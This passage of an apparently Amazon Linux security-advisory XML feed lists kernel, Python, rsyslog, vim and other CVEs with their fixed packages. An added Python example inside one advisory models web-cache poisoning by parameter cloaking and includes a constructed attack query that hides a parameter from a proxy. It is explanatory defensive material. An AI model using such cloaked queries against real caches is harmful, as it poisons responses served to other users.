</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1271" title="" id="CVE-2022-1271" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="gzip-debuginfo" version="1.5" release="9.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/gzip-debuginfo-1.5-9.20.amzn1.x86_64.rpm</filename></package><package name="gzip" version="1.5" release="9.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/gzip-1.5-9.20.amzn1.x86_64.rpm</filename></package><package name="gzip-debuginfo" version="1.5" release="9.20.amzn1" epoch="0" arch="i686"><filename>Packages/gzip-debuginfo-1.5-9.20.amzn1.i686.rpm</filename></package><package name="gzip" version="1.5" release="9.20.amzn1" epoch="0" arch="i686"><filename>Packages/gzip-1.5-9.20.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1591</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1591: important priority package update for kernel</title><issued date="2022-05-31 23:47:00" /><updated date="2025-05-21 21:01:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-4459:
A NULL pointer dereference flaw was found in vmxnet3_rq_cleanup in drivers/net/vmxnet3/vmxnet3_drv.c in the networking sub-component in vmxnet3 in the Linux Kernel. This issue may allow a local attacker with normal user privilege to cause a denial of service due to a missing sanity check during cleanup.
CVE-2023-4387:
A use-after-free flaw was found in vmxnet3_rq_alloc_rx_buf in drivers/net/vmxnet3/vmxnet3_drv.c in VMware's vmxnet3 ethernet NIC driver in the Linux Kernel. This issue could allow a local attacker to crash the system due to a double-free while cleaning up vmxnet3_rq_cleanup_all, which could also lead to a kernel information leak problem.
CVE-2023-1637:
A flaw was found in the Linux kernel's X86 CPU power management options functionality, in the way the boot CPU is resumed from suspend-to-RAM, which could leave the boot CPU vulnerable to speculative-execution-style attacks. A local user could use this flaw to potentially gain unauthorized access to some CPU memory, similar to speculative execution attacks.
CVE-2022-49287:
In the Linux kernel, the following vulnerability has been resolved:
tpm: fix reference counting for struct tpm_chip
CVE-2022-49114:
In the Linux kernel, the following vulnerability has been resolved:
scsi: libfc: Fix use after free in fc_exch_abts_resp()
CVE-2022-49085:
In the Linux kernel, the following vulnerability has been resolved:
drbd: Fix five use after free bugs in get_initial_state
CVE-2022-49058:
In the Linux kernel, the following vulnerability has been resolved:
cifs: potential buffer overflow in handling symlinks
CVE-2022-41858:
A flaw was found in the Linux kernel. A NULL pointer dereference may occur while a slip driver is in progress to detach in sl_tx_timeout in drivers/net/slip/slip.c. This issue could allow an attacker to crash the system or leak internal kernel information.
CVE-2022-30594:
The Linux kernel before 5.17.2 mishandles seccomp permissions. The PTRACE_SEIZE code path allows attackers to bypass intended restrictions on setting the PT_SUSPEND_SECCOMP flag.
CVE-2022-2977:
A flaw was found in the Linux kernel implementation of proxied virtualized TPM devices. On a system where virtualized TPM devices are configured (this is not the default) a local attacker can create a use-after-free and create a situation where it may be possible to escalate privileges on the system.
CVE-2022-29581:
An Improper Update of Reference Count vulnerability in net/sched of the Linux kernel allows a local attacker to escalate privileges to root. This issue affects Linux kernel versions prior to 5.18, from version 4.14 onward.
CVE-2022-28390:
A double-free flaw was found in the Linux kernel in the ems_usb_start_xmit function. This flaw allows an attacker to create a memory leak and corrupt the underlying data structure by calling free more than once.
CVE-2022-28389:
mcba_usb_start_xmit in drivers/net/can/usb/mcba_usb.c in the Linux kernel through 5.17.1 has a double free.
CVE-2022-2639:
An integer coercion error was found in the openvswitch kernel module. Given a sufficiently large number of actions, while copying and reserving memory for a new action of a new flow, the reserve_sfa_size() function does not return -EMSGSIZE as expected, potentially leading to an out-of-bounds write access. This flaw allows a local user to crash or potentially escalate their privileges on the system.
CVE-2022-1729:
perf: Fix sys_perf_event_open() race against self
CVE-2022-1516:
A NULL pointer dereference flaw was found in the Linux kernel's X.25 set of standardized network protocols functionality in the way a user terminates their session using a simulated Ethernet card and continued usage of this connection. This flaw allows a local user to crash the system.
CVE-2022-1353:
A vulnerability was found in the pfkey_register function in net/key/af_key.c in the Linux kernel. This flaw allows a local, unprivileged user to gain access to kernel memory, leading to a system crash or a leak of internal kernel information.
CVE-2022-1011:
A use-after-free flaw was found in the Linux kernel's FUSE filesystem in the way a user triggers write(). This flaw allows a local user to gain unauthorized access to data from the FUSE filesystem, resulting in privilege escalation.
CVE-2022-0854:
A memory leak flaw was found in the Linux kernel's DMA subsystem, in the way a user calls DMA_FROM_DEVICE. This flaw allows a local user to read random memory from the kernel space.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0854" title="" id="CVE-2022-0854" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1011" title="" id="CVE-2022-1011" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1353" title="" id="CVE-2022-1353" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1516" title="" id="CVE-2022-1516" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1729" title="" id="CVE-2022-1729" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2639" title="" id="CVE-2022-2639" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-28389" title="" id="CVE-2022-28389" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-28390" title="" id="CVE-2022-28390" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29581" title="" id="CVE-2022-29581" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2977" title="" id="CVE-2022-2977" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30594" title="" id="CVE-2022-30594" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41858" title="" id="CVE-2022-41858" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-49058" title="" id="CVE-2022-49058" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-49085" title="" id="CVE-2022-49085" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-49114" title="" id="CVE-2022-49114" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-49287" title="" id="CVE-2022-49287" type="cve" /><reference 
href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-1637" title="" id="CVE-2023-1637" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-4387" title="" id="CVE-2023-4387" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-4459" title="" id="CVE-2023-4459" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-tools" version="4.14.281" release="144.502.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.281-144.502.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.281" release="144.502.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.281-144.502.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.281" release="144.502.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.281-144.502.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.281" release="144.502.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.281-144.502.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.281" release="144.502.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.281-144.502.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.281" release="144.502.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.281-144.502.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.281" release="144.502.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.281-144.502.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.281" release="144.502.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.281-144.502.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.281" 
release="144.502.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.281-144.502.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.281" release="144.502.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.281-144.502.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.281" release="144.502.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.281-144.502.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.281" release="144.502.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.281-144.502.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.281" release="144.502.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.281-144.502.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.281" release="144.502.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.281-144.502.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.281" release="144.502.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.281-144.502.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.281" release="144.502.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.281-144.502.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.281" release="144.502.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.281-144.502.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.281" release="144.502.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.281-144.502.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.281" release="144.502.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.281-144.502.amzn1.i686.rpm</filename></package><package name="kernel-headers" 
version="4.14.281" release="144.502.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.281-144.502.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1592</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1592: important priority package update for python-twisted-conch</title><issued date="2022-05-31 23:47:00" /><updated date="2022-06-09 18:52:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-21716:
An uncontrolled resource consumption flaw was found in python-twisted in the dataReceived() function. This flaw allows an unauthenticated, remote attacker to send a simple command to use all available memory and crash the server.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21716" title="" id="CVE-2022-21716" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python27-twisted-conch" version="8.2.0" release="3.2.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-twisted-conch-8.2.0-3.2.7.amzn1.x86_64.rpm</filename></package><package name="python26-twisted-conch" version="8.2.0" release="3.2.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/python26-twisted-conch-8.2.0-3.2.7.amzn1.x86_64.rpm</filename></package><package name="python26-twisted-conch" version="8.2.0" release="3.2.7.amzn1" epoch="0" arch="i686"><filename>Packages/python26-twisted-conch-8.2.0-3.2.7.amzn1.i686.rpm</filename></package><package name="python27-twisted-conch" version="8.2.0" release="3.2.7.amzn1" epoch="0" arch="i686"><filename>Packages/python27-twisted-conch-8.2.0-3.2.7.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1593</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1593: medium priority package update for python27</title><issued date="2022-05-31 23:47:00" /><updated date="2022-06-09 18:53:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-0391:
A flaw was found in Python, specifically within the urllib.parse module. This module helps break Uniform Resource Locator (URL) strings into components. The issue involves how the urlparse method does not sanitize input and allows characters like \r and \n in the URL path. This flaw allows an attacker to supply a crafted URL, leading to injection attacks.
CVE-2021-4189:
ftplib should not use the host from the PASV response
CVE-2021-3737:
A flaw was found in python. An improperly handled HTTP response in the HTTP client code of python may allow a remote attacker, who controls the HTTP server, to make the client script enter an infinite loop, consuming CPU time. The highest threat from this vulnerability is to system availability.
CVE-2021-3733:
There's a flaw in urllib's AbstractBasicAuthHandler class. An attacker who controls a malicious HTTP server that an HTTP client (such as web browser) connects to, could trigger a Regular Expression Denial of Service (ReDOS) during an authentication request with a specially crafted payload that is sent by the server to the client. The greatest threat that this flaw poses is to application availability.
CVE-2021-23336:
The package python/cpython is vulnerable to Web Cache Poisoning via urllib.parse.parse_qsl and urllib.parse.parse_qs by using a vector called parameter cloaking. When the attacker can separate query parameters using a semicolon (;), they can cause a difference in the interpretation of the request between the proxy (running with default configuration) and the server. This can result in malicious requests being cached as completely safe ones, as the proxy would usually not see the semicolon as a separator, and therefore would not include it in a cache key of an unkeyed parameter.
CVE-2020-27619:
In Python3's Lib/test/multibytecodec_support.py CJK codec tests call eval() on content retrieved via HTTP.
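Added worked example (not part of this advisory, and not CPython's own code): the two urllib behaviours described above, written out as checks. It models how a caching proxy and an unpatched parse_qs() tokenise the same query string, computes the proxy's cache key for a constructed request, and wraps urlsplit() in a check that rejects CR, LF and TAB outright instead of relying on the parser to strip them. The proxy model, the unkeyed parameter names and the sample query are assumptions for illustration, not taken from any particular product.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Ampersand spelled as chr(38) so that this listing contains no raw ampersand.
AMP = chr(38)

# The characters a patched CPython strips from a URL before parsing
# (fix for CVE-2022-0391).  Rejecting them is stricter than stripping.
_CONTROL_CHARS = re.compile(r"[\r\n\t]")


def has_control_chars(url):
    """True if the URL carries CR, LF or TAB anywhere."""
    return bool(_CONTROL_CHARS.search(url))


def strict_urlsplit(url):
    """urlsplit() that refuses CR, LF and TAB instead of parsing around them.

    Unpatched CPython kept these characters in the path or query, so a
    crafted URL could smuggle an extra line into whatever the components
    were later written into.  Patched versions strip them silently; for
    attacker-supplied URLs, rejecting is the safer policy because silent
    stripping can also change the URL's meaning.
    """
    if has_control_chars(url):
        raise ValueError("control character in URL: %r" % url)
    return urlsplit(url)


def _pairs_to_dict(pairs):
    """Turn 'k=v' fragments into {key: [values]} the way parse_qs() does."""
    params = {}
    for pair in pairs:
        if not pair:
            continue
        key, _, value = pair.partition("=")
        params.setdefault(unquote_plus(key), []).append(unquote_plus(value))
    return params


def proxy_view(query):
    """A typical caching proxy tokenises the query on the ampersand only."""
    return _pairs_to_dict(query.split(AMP))


def legacy_server_view(query):
    """parse_qs() before the CVE-2021-23336 fix: split on ampersand AND ';'."""
    return _pairs_to_dict(p for chunk in query.split(AMP) for p in chunk.split(";"))


def cloaked_params(query):
    """Parameters the legacy server sees but the proxy does not see at all."""
    proxy = proxy_view(query)
    return {k: v for k, v in legacy_server_view(query).items() if k not in proxy}


def proxy_cache_key(path, query, unkeyed=("utm_content", "utm_source")):
    """Cache key of a proxy that drops 'unkeyed' tracking parameters.

    Two requests with the same key share one cached response, so any
    parameter cloaked behind an unkeyed one is invisible to the cache.
    """
    keyed = sorted((k, tuple(v)) for k, v in proxy_view(query).items() if k not in unkeyed)
    return (path, tuple(keyed))


if __name__ == "__main__":
    # Constructed attack query: the proxy sees only utm_content (unkeyed),
    # the legacy server additionally sees lang=evil.
    q = "utm_content=1;lang=evil"
    print("proxy view      :", proxy_view(q))
    print("legacy server   :", legacy_server_view(q))
    print("cloaked         :", cloaked_params(q))
    print("same cache key? :", proxy_cache_key("/", q) == proxy_cache_key("/", ""))
```

The cache-key function is the heart of the parameter-cloaking issue: for the constructed query the proxy's key is identical to the key for a request with no query at all, while the legacy server answers with lang=evil, so that answer is what gets cached for every plain visitor.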
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27619" title="" id="CVE-2020-27619" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23336" title="" id="CVE-2021-23336" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3733" title="" id="CVE-2021-3733" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3737" title="" id="CVE-2021-3737" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4189" title="" id="CVE-2021-4189" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0391" title="" id="CVE-2022-0391" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python27-debuginfo" version="2.7.18" release="2.142.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-debuginfo-2.7.18-2.142.amzn1.x86_64.rpm</filename></package><package name="python27-tools" version="2.7.18" release="2.142.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-tools-2.7.18-2.142.amzn1.x86_64.rpm</filename></package><package name="python27-libs" version="2.7.18" release="2.142.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-libs-2.7.18-2.142.amzn1.x86_64.rpm</filename></package><package name="python27-devel" version="2.7.18" release="2.142.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-devel-2.7.18-2.142.amzn1.x86_64.rpm</filename></package><package name="python27" version="2.7.18" release="2.142.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-2.7.18-2.142.amzn1.x86_64.rpm</filename></package><package name="python27-test" version="2.7.18" release="2.142.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-test-2.7.18-2.142.amzn1.x86_64.rpm</filename></package><package name="python27-debuginfo" version="2.7.18" release="2.142.amzn1" epoch="0" 
arch="i686"><filename>Packages/python27-debuginfo-2.7.18-2.142.amzn1.i686.rpm</filename></package><package name="python27-libs" version="2.7.18" release="2.142.amzn1" epoch="0" arch="i686"><filename>Packages/python27-libs-2.7.18-2.142.amzn1.i686.rpm</filename></package><package name="python27" version="2.7.18" release="2.142.amzn1" epoch="0" arch="i686"><filename>Packages/python27-2.7.18-2.142.amzn1.i686.rpm</filename></package><package name="python27-test" version="2.7.18" release="2.142.amzn1" epoch="0" arch="i686"><filename>Packages/python27-test-2.7.18-2.142.amzn1.i686.rpm</filename></package><package name="python27-tools" version="2.7.18" release="2.142.amzn1" epoch="0" arch="i686"><filename>Packages/python27-tools-2.7.18-2.142.amzn1.i686.rpm</filename></package><package name="python27-devel" version="2.7.18" release="2.142.amzn1" epoch="0" arch="i686"><filename>Packages/python27-devel-2.7.18-2.142.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1594</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1594: important priority package update for rsyslog</title><issued date="2022-05-31 23:47:00" /><updated date="2022-06-09 18:54:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-24903:
A flaw was found in rsyslog's TCP reception modules. A remote attacker who can reach the TCP syslog port can craft a malicious message that triggers a heap-based buffer overflow. This lets the attacker corrupt or access data stored in memory, leading to a denial of service of rsyslog or possible remote code execution.
CVE-2014-3634:
A flaw was found in the way rsyslog handled invalid log message priority values. In certain configurations, a local attacker, or a remote attacker able to connect to the rsyslog port, could use this flaw to crash the rsyslog daemon or, potentially in rsyslog 7.x, execute arbitrary code as the user running the rsyslog daemon.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3634" title="" id="CVE-2014-3634" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-24903" title="" id="CVE-2022-24903" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="rsyslog-pgsql" version="5.8.10" release="9.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/rsyslog-pgsql-5.8.10-9.29.amzn1.x86_64.rpm</filename></package><package name="rsyslog-mysql" version="5.8.10" release="9.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/rsyslog-mysql-5.8.10-9.29.amzn1.x86_64.rpm</filename></package><package name="rsyslog-gnutls" version="5.8.10" release="9.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/rsyslog-gnutls-5.8.10-9.29.amzn1.x86_64.rpm</filename></package><package name="rsyslog-debuginfo" version="5.8.10" release="9.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/rsyslog-debuginfo-5.8.10-9.29.amzn1.x86_64.rpm</filename></package><package name="rsyslog-snmp" version="5.8.10" release="9.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/rsyslog-snmp-5.8.10-9.29.amzn1.x86_64.rpm</filename></package><package name="rsyslog-gssapi" version="5.8.10" release="9.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/rsyslog-gssapi-5.8.10-9.29.amzn1.x86_64.rpm</filename></package><package name="rsyslog" version="5.8.10" release="9.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/rsyslog-5.8.10-9.29.amzn1.x86_64.rpm</filename></package><package name="rsyslog-mysql" version="5.8.10" release="9.29.amzn1" epoch="0" arch="i686"><filename>Packages/rsyslog-mysql-5.8.10-9.29.amzn1.i686.rpm</filename></package><package name="rsyslog" version="5.8.10" release="9.29.amzn1" epoch="0" arch="i686"><filename>Packages/rsyslog-5.8.10-9.29.amzn1.i686.rpm</filename></package><package name="rsyslog-snmp" version="5.8.10" release="9.29.amzn1" epoch="0" 
arch="i686"><filename>Packages/rsyslog-snmp-5.8.10-9.29.amzn1.i686.rpm</filename></package><package name="rsyslog-pgsql" version="5.8.10" release="9.29.amzn1" epoch="0" arch="i686"><filename>Packages/rsyslog-pgsql-5.8.10-9.29.amzn1.i686.rpm</filename></package><package name="rsyslog-gnutls" version="5.8.10" release="9.29.amzn1" epoch="0" arch="i686"><filename>Packages/rsyslog-gnutls-5.8.10-9.29.amzn1.i686.rpm</filename></package><package name="rsyslog-gssapi" version="5.8.10" release="9.29.amzn1" epoch="0" arch="i686"><filename>Packages/rsyslog-gssapi-5.8.10-9.29.amzn1.i686.rpm</filename></package><package name="rsyslog-debuginfo" version="5.8.10" release="9.29.amzn1" epoch="0" arch="i686"><filename>Packages/rsyslog-debuginfo-5.8.10-9.29.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1595</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1595: important priority package update for rubygem-nokogiri rubygem18-nokogiri</title><issued date="2022-05-31 23:47:00" /><updated date="2022-06-09 18:55:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-24836:
Nokogiri is an open source XML and HTML library for Ruby. Nokogiri `< v1.13.4` contains an inefficient regular expression that is susceptible to excessive backtracking when attempting to detect encoding in HTML documents. Users are advised to upgrade to Nokogiri `>= 1.13.4`. There are no known workarounds for this issue.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-24836" title="" id="CVE-2022-24836" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="rubygem20-nokogiri-doc" version="1.6.1" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem20-nokogiri-doc-1.6.1-1.22.amzn1.x86_64.rpm</filename></package><package name="rubygem22-nokogiri-doc" version="1.6.1" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem22-nokogiri-doc-1.6.1-1.22.amzn1.x86_64.rpm</filename></package><package name="rubygem21-nokogiri" version="1.6.1" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem21-nokogiri-1.6.1-1.22.amzn1.x86_64.rpm</filename></package><package name="rubygem-nokogiri-debuginfo" version="1.6.1" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem-nokogiri-debuginfo-1.6.1-1.22.amzn1.x86_64.rpm</filename></package><package name="rubygem20-nokogiri" version="1.6.1" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem20-nokogiri-1.6.1-1.22.amzn1.x86_64.rpm</filename></package><package name="rubygem21-nokogiri-doc" version="1.6.1" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem21-nokogiri-doc-1.6.1-1.22.amzn1.x86_64.rpm</filename></package><package name="rubygem22-nokogiri" version="1.6.1" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem22-nokogiri-1.6.1-1.22.amzn1.x86_64.rpm</filename></package><package name="rubygem21-nokogiri-doc" version="1.6.1" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem21-nokogiri-doc-1.6.1-1.22.amzn1.i686.rpm</filename></package><package name="rubygem22-nokogiri" version="1.6.1" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem22-nokogiri-1.6.1-1.22.amzn1.i686.rpm</filename></package><package name="rubygem-nokogiri-debuginfo" version="1.6.1" release="1.22.amzn1" 
epoch="0" arch="i686"><filename>Packages/rubygem-nokogiri-debuginfo-1.6.1-1.22.amzn1.i686.rpm</filename></package><package name="rubygem20-nokogiri" version="1.6.1" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem20-nokogiri-1.6.1-1.22.amzn1.i686.rpm</filename></package><package name="rubygem21-nokogiri" version="1.6.1" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem21-nokogiri-1.6.1-1.22.amzn1.i686.rpm</filename></package><package name="rubygem22-nokogiri-doc" version="1.6.1" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem22-nokogiri-doc-1.6.1-1.22.amzn1.i686.rpm</filename></package><package name="rubygem20-nokogiri-doc" version="1.6.1" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem20-nokogiri-doc-1.6.1-1.22.amzn1.i686.rpm</filename></package><package name="rubygem18-nokogiri-doc" version="1.5.11" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem18-nokogiri-doc-1.5.11-1.16.amzn1.x86_64.rpm</filename></package><package name="rubygem18-nokogiri" version="1.5.11" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem18-nokogiri-1.5.11-1.16.amzn1.x86_64.rpm</filename></package><package name="rubygem18-nokogiri-debuginfo" version="1.5.11" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem18-nokogiri-debuginfo-1.5.11-1.16.amzn1.x86_64.rpm</filename></package><package name="rubygem18-nokogiri" version="1.5.11" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem18-nokogiri-1.5.11-1.16.amzn1.i686.rpm</filename></package><package name="rubygem18-nokogiri-debuginfo" version="1.5.11" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem18-nokogiri-debuginfo-1.5.11-1.16.amzn1.i686.rpm</filename></package><package name="rubygem18-nokogiri-doc" version="1.5.11" release="1.16.amzn1" epoch="0" 
arch="i686"><filename>Packages/rubygem18-nokogiri-doc-1.5.11-1.16.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1597</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1597: important priority package update for vim</title><issued date="2022-05-31 23:47:00" /><updated date="2022-06-09 18:56:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-1420:
A vulnerability was found in Vim. The issue occurs when using a number in a string for the lambda name, triggering an out-of-range pointer offset vulnerability. This flaw allows an attacker to trick a user into opening a crafted script containing an argument as a number and then using it as a string pointer to access any memory location, causing an application to crash and possibly access some memory.
CVE-2022-1381:
A global heap buffer overflow vulnerability was found in vim's skip_range() function of the src/ex_docmd.c file. This flaw occurs because vim uses an invalid pointer with V: in Ex mode. This flaw allows an attacker to trick a user into opening a specially crafted file, triggering a heap buffer overflow that causes an application to crash, leading to a denial of service.
CVE-2022-1160:
A heap buffer overflow flaw was found in vim's get_one_sourceline() function of the scriptfile.c file. This flaw occurs when the :source command reads past the end of the copied line. This flaw allows an attacker to trick a user into opening a crafted file, triggering a heap overflow and causing the application to crash, which leads to a denial of service.
CVE-2022-1154:
A heap use-after-free vulnerability was found in Vim's utf_ptr2char() function of the src/mbyte.c file. This flaw occurs because vim is using a buffer line after it has been freed in the old regexp engine. This flaw allows an attacker to trick a user into opening a specially crafted file, triggering a heap use-after-free that causes an application to crash, possibly executing code and corrupting memory.
CVE-2022-0943:
A heap buffer overflow flaw was found in vim's suggest_try_change() function of the spellsuggest.c file. This flaw allows an attacker to trick a user into opening a crafted file, triggering a heap-overflow and causing an application to crash, which leads to a denial of service.
CVE-2022-0572:
A heap-based buffer overflow flaw was found in vim's ex_retab() function of indent.c file. This flaw occurs when repeatedly using :retab. This flaw allows an attacker to trick a user into opening a crafted file triggering a heap-overflow.
